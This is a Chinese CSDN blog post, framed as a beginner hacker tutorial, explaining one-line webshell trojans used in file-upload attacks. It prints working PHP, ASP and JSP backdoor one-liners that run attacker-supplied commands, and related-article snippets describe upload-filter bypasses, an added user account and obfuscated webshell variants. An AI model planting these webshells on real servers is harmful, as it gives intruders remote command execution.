黑客小白进阶之路——文件上传之一句话木马

最新推荐文章于 2024-03-16 10:13:46 发布
最新推荐文章于 2024-03-16 10:13:46 发布
阅读量1.2k 收藏 1
点赞数
分类专栏: 黑客技术 文章标签: php java
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Hacker_by_V/article/details/108260604
版权

一句话木马原理

什么是一句话木马?
Webshell:webshell就是以网页文件形式存在的一种命令执行环境,也可以将其称之为一种网页后门,顾名思义,web的含义是显然需要服务器开放web服务,shell的含义是取得对服务器某种程度上的操作权限。
Webshell通常被叫做入侵者通过网站端口对网站服务器的某种程度上操作的权限,由于webshell大多数是以动态脚本的形式出现,也有人称之为网站的后门工具,一句话木马、大马、小马都可以叫webshell。
而我们的一句话木马只需要一行代码的木马,短短的一行代码,配合webshell工具使用就会有很强大的效果。

一句话木马讲解类型

PHP一句话木马讲解
以PHP为例,代码形式:

<?php@eval($_POST[“shell”]);?>

首先存在一个名为shell的变量,shell的取值为HTTP的POST方式,web服务器对shell取值以后,然后通过eval()函数来执行shell的内容。
使用:eval使用需要加上system(),sytem函数执行外部程序,并且显示输出,或者蚁剑连接。

ASP一句话木马讲解
代码形式:
<%ebal request(“cmd”)%>
上面的asp一句话和php一句话,通过eval函数执行request中的cmd的内容,原理与php一句话类型类似。

JSP一句话木马讲解
代码形式:
<%Runtime.getRuntime().exec(request.getParameter(“cmd”));%>
Runtime类封装了运行时的环境,每个java应用程序都有一个Runtime类实例,使用应用程序能够与其运行的环境相连接,使用getRuntime()构建Runtime类实例,getRuntime()返回与当前java应用程序相关的运行时对象,获取实例后调用exec()方法执行系统命令,request为JSP内置对象,getRuntime()方法获取请求参数cmd的值构建命令。

我们还是重点以php来做这样的一个研究,因为现在目前百分之七八十的网站都是通过php这门脚本语言去编写的网站。

Hacker_by_V
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
一句话木马要点和防范注意事项
05-24
"一句话木马",顾名思义,是指利用简短的代码实现的恶意程序,它通常隐藏在网页、脚本或者其他可执行文件中,通过Web服务的漏洞进行植入,以达到远程控制或非法获取服务器权限的目的。这类木马因为其简洁高效的特点...
一句话木马上传常见的几种方法
自律即自由
09-12 3376
1,利用00截断,brupsuite上传 利用00截断就是利用程序员在写程序时对文件的上传路径过滤不严格,产生0X00上传截断漏洞。 假设文件的上传路径为http://xx.xx.xx.xx/upfiles/lubr.php.jpg ,通过Burpsuite抓包截断将lubr.php后面的“.”换成“0X00”。在上传的时候,当文件系统读到”0X00″时,会认为文件已经结束,从而将lubr.php.jpg 的内容写到lubr.php中,从而达到攻击的目的。 2,构造服务器端扩展名检测上传 当浏览器将文
文件上传一句话木马getshell
qq_41620273的博客
12-25 5608
文件上传 文件上传流程: a.文件表单提交 b.生成临时文件(读取临时文件信息) c.后端语言判断该文件是否合规 d.合规则保存文件 一句话木马: 1.在phpstudy搭建的站点www目录下写入一个php文件,访问该网站下的php文件成功: 命令执行函数:system()、Exec()、 Shell_exec() passthru(): 只调用命令,把命令的运行结果原样地直接输出到标准输出设备上 1.如url中输入:XXXX/1.php?a=net user mqu sss /add
黑客如何给你的系统种上木马
不用此栏
07-24 2127
相信很多朋友都听说过木马程序,总觉得它很神秘、很高难,但事实上随着木马软件的智能化,很多骇客都能轻松达到攻击的目的。今天,笔者就以最新的一款木马程序——黑洞2004,从种植、使用、隐藏、防范四个方面来为网络爱好者介绍一下木马的特性。需要提醒大家的是,在使用木马程序的时候,请先关闭系统中的病毒防火墙,因为杀毒软件会把木马作为病毒的一种进行查杀。 操作步骤:   一、种植木马   现在网络上流行的木马
一句话php木马制作教程_菜刀无法正常访问一句话问题
weixin_35092037的博客
12-21 1801
今天自己搭建了一个php版的xss cookie接收平台。为了图操作上的方便,给自己的web放了一句话木马。但是当我打开菜刀连接时,报了500错误,如图想到可能是php版本问题导致这个问题的。查看了一下服务器上的php版本,7.0.33抓包查看菜刀数据: 去掉z0数据访问正常 那么问题点在z0数据了,解密z0数据: 看到解密后的z0数据,一下想到了...
文件上传漏洞------一句话木马原理解析
m0_69151365的博客
03-11 2250
这是一个最简单的一句话木马,我们用GET传参接受了两个参数,其最终目的是构造出:assert($_GET['1']) -> assert(eval(phpinfo()))这样的语句。我们也可以直接构造eval,但是很容易被杀,在我个人电脑上我们可以关闭保护软件,但是我们可以关闭网站服务器的杀毒软件吗?这串代码是在对上一个代码进行base64解码,完了我们还要执行assert(eval(muma)) 这就是一句话木马的总体原理。我们设置成不允许,刷新靶场再次上传木马文件发现上传成功了。接下来就开始抓包了。
PHP隐形一句话后门,和ThinkPHP框架加密码程序(base64_decode)
10-28
隐形一句话后门是黑客植入Web应用中的隐蔽代码,通常用于远程控制和恶意活动。这种后门很难被检测到,因为它通常被编码和隐藏在正常代码中。 首先,我们看到一个名为`mm.php`的文件,其内容包含`($_POST[c]);?>`。...
Cknife 一句话连接工具.7z
07-17
【描述】描述中提到"Cknife里面有1.jsp一句话",这指的是Cknife工具中包含了一个名为"1.jsp"的一句话木马。这种木马通常是一段简短的Java代码,能够在Web服务器执行命令,允许攻击者通过HTTP请求远程控制目标系统...
Web系统的安全性测试之文件和目录测试
02-24
(1)Web漏洞扫描(2)服务器端信息测试(3)文件和目录测试(4)认证测试(5)会话管理测试(6)权限管理测试(7)文件上传下载测试(8)信息泄漏测试(9)输入数据测试(10)跨站脚本攻击测试(11)逻辑测试(12)搜索引擎信息测试(13)...
一句话木马(二)
Snowflake1997的博客
12-03 330
Get代码: 创建get.php文档 <?php @eval($_GET[‘llll’]); ?> 编写完后在浏览器中输入http://192.168.5.33/get.php?llll=system(‘ipconfig’); 出现乱码,加入代码header("Content-type:text/html;charset=gbk"); Post代码: 创建post.php文档 <?php header("Content-type:text/html;char
文件上传漏洞(一句话木马)-学习笔记
小龙在线
08-21 2万+
在很多的渗透过程中,渗透人员会上传一句话木马(简称Webshell)到目前web服务目录继而提权获取系统权 限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢? 先来看看最简单的一句话木马
上传漏洞(一句话木马、中国菜刀使用、DVWA文件上传漏洞利用)
最新发布
qq_53058639的博客
03-16 1609
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Web安全-一句话木马
热门推荐
道阻且长,行则将至。
05-08 31万+
在很多的渗透过程中,渗透人员会上传一句话木马到目标web服务目录继而提权获取系统权限,不论asp、php、jsp、aspx都是如此,那么一句话木马到底是什么呢?
shell解析命令行的过程以及eval命令
weixin_33950035的博客
08-25 162
bash&amp;shell系列文章:http://www.cnblogs.com/f-ck-need-u/p/7048359.html 本文说明的是一条linux命令在执行时大致要经过哪些过程?以及这些过程的大致顺序。 1.1 shell解析命令行 shell读取和执行命令时的大致操作过程如下图: (注:图中没有画出"函数"的位置。它的位置和别名并列,但优先级低于别名。也就是说,...
WebShell变形
bylfsj的博客
10-31 544
4.1.7. WebShell¶ 4.1.7.1. 常见变形¶ GLOBALS eval($GLOBALS['_POST']['op']); $_FILE eval($_FILE['name']); 拆分 assert(${"_PO"."ST"} ['sz']); 动态函数执行 $k="ass"."ert"; $k(${"_PO"."ST"} ['sz...
上传漏洞-一句话木马
Coisini的博客
05-30 8495
声明:为什么又写一篇关于一句话木马,对,我第一次没写明白,直写了一句话木马的简单制作,但是还是有很多同学真的看不懂,所以我今天改一下,这次精写! 上传漏洞-一句话木马 讲述内容一句话木马 木马使用技巧 (中国菜刀、C32、CKnife) 简介: 一句话木马 一句话木马短小精悍,而且功能强大,隐蔽性非常好,在入侵中始终扮演着强大的作用 往目标网站中加入一句话木马,然后你就可以在本地通过...
一句话木马文件上传
zhong_yan的博客
10-28 5320
前言,本博客只用于记录,不用于参考,并且并非真实的网站,而是搭建的靶场。 (要是学长看了我的博客的话,能不能告诉我咱学校的网站有没有后门什么的(划掉),传授一些经验。) 第一步:文件上传靶场upload-labs搭建 首先,启动PHP_study.(什么,不知道,不会上网查吗。zhong_yan博主,你可真是个废物) 将upload-labs-master拖拽至WWW(PHP_study)目录(本博客只是记录,并非参考) 之后启动,就上面的那张图片(阿帕奇就可以了) ...
黑客入门教程:从菜鸟到高手的进阶之路
黑客的主要行为之一是学习技术。一旦互联网上出现新技术,黑客就需要快速学习并深入理解其工作原理。对于初级黑客,他们需要从基础知识开始学习,这可能包括许多复杂的概念。互联网提供了丰富的学习资源,但同时也...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值